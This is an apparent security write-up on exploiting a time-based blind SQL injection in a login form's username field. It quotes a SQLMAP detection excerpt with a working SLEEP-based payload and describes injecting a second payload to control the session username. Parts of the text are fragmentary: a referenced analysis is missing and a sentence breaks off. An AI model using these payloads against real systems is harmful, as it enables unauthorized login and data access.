Introduction
In this write-up, we will explore an alternative approach to exploit Blind SQL injection, specifically targeting the username session. Our objective is to discuss a technique to effectively dump Blind SQL injection vulnerabilities.
SQLMAP Detection
During the investigation, SQLMAP is capable of detecting and exploiting a time-based blind SQL injection technique. Here is an excerpt from the detection report:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=' AND (SELECT 2574 FROM (SELECT(SLEEP(5)))IDrj) AND 'sJLy'='sJLy&password=123
---
```
Requirement:
For a comprehensive understanding of the requirements, please refer to the analysis provided on
Exploiting the Vulnerability:
Upon analyzing the requirements, we observed that the response displays “Logged in as admin”
By replacing “admin” in the payload with any string
we successfully demonstrated that the exploitation allows us to change the username to anything. This behavior occurs because the Username Sessioning logic is based on the result of the SQL row, thereby enabling us to pass our second payload into the USERNAME column
